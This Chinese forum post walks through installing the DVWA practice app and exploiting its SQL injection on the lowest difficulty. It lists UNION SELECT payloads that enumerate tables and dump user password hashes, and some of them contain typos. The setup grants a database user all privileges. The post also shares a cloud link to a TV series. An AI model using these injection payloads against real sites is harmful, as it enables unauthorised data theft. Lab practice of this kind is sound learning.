找回密码
 注册

QQ登录

只需一步,快速开始

quiet_tony

新手上路

  • 11

    积分

  • 6

    帖子

  • 0

    精华

本帖最后由 quiet_tony 于 2019-7-4 19:50 编辑

DVWA是用php语言写的安全测试平台
如果你网安入门,并且找不到合适的靶机,推荐将DVWA作为你的渗透演练系统
Download
https://github.com/ethicalhack3r/DVWA        #Github下载地址

Install
1. 解压先cd进入目录
unzip XXX.zip

2. 将解压的文件夹移入目录
mv XXX dvwa   #将文件夹改名
mv dvwa /var/www/html
3. 修改文件夹权限:
chmod -R 755 dvwa   #-recursive (递归更改文件和目录)755:保留完全访问权限,阻止他人修改文件

4.  启动apache2 和mysql
service apache2 start  
service mysql start  

#如果有一行Error,把start改成restart. 每次开机想打开DVWA前先start一下

5. 进入mysql
mysql -u root -p

6. 输入以下建库以及初始化(分开来输)
create database dvwa;
create user 'dvwa'@'localhost' identified by 'dvwa';
grant all on *.* to 'dvwa'@'localhost';
set password for 'dvwa'@'localhost' = password('dvwa');
exit

8. 修改配置文件
cd /var/www/hrml/dvwa/config/
mv config.inc.php.dist config.inc.php
vi config.inc.php


9. 修改配置信息
$_DVWA[ 'db_user' ] = 'dvwa';
$_DVWA[ 'db_password' ] = 'dvwa';
$_DVWA[ 'db_database' ] = 'dvwa';


10. 浏览器输入127.0.0.1/dvwa或localhost/dvwa,按下方Create进入dvwa界面
初始账密:admin password
sql注入
1. 进入界面,在DVWA Sercurity选项中选Low(最低难度),然后记得Submit。选择SQL Injection

2. 输入1, 返回ID为1的用户名

3. 尝试and 1=1, 发现没变化。and 1=2, 也没变。下一步尝试字符注入。

尝试' 报错,再尝试‘or 1=1或者'or '1=1爆出所有ID和用户名。
确定为字符注入。
4. 判断数据库个数,尝试 'union select 1,2' ,爆出至少有数据库2个。

尝试'union select 1,2,3',报错,只有两个。

5. 'union select 2,database()',爆出数据库名dvwa

6. 爆表,‘union select 2, group_concat(table_name) from infromation_schema.tables where table_schema=database()#
可以看到只有两个表users,guestbook。

7.  爆字段,'union select 2,group_concat(column_name) from information_scheme,colums where table_name='users'#
第四个字段就是密码,马上大功告成了。

8. 查看字段,'union select group_concat(user_id,first_name),group_concat(password) from users#

第一个MD5码是密码,网页查询,得到密码password
结合步骤,用户是admin,ID为1

上传漏洞,注入完毕。
有一部电影《黑客军团》,主角就是用kali的,可以打发打发时间,个人认为情节什么的还行,偏黑暗风。
链接:
https://pan.baidu.com/s/1BYLfEhG4aFKQE-X5BpyMCg 提取码:u12z
我是一名新人小白,希望能和大佬多多交流。















来自群组: kali学习

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?注册

x
分享至 : QQ空间
收藏
我不怕黑暗,也不怕堕落。

4 个回复

倒序浏览
此帖仅作者可见
使用道具 举报
此帖仅作者可见
使用道具 举报
此帖仅作者可见
我不怕黑暗,也不怕堕落。
使用道具 举报
此帖仅作者可见
我不怕黑暗,也不怕堕落。
使用道具 举报
您需要登录后才可以回帖 登录 | 注册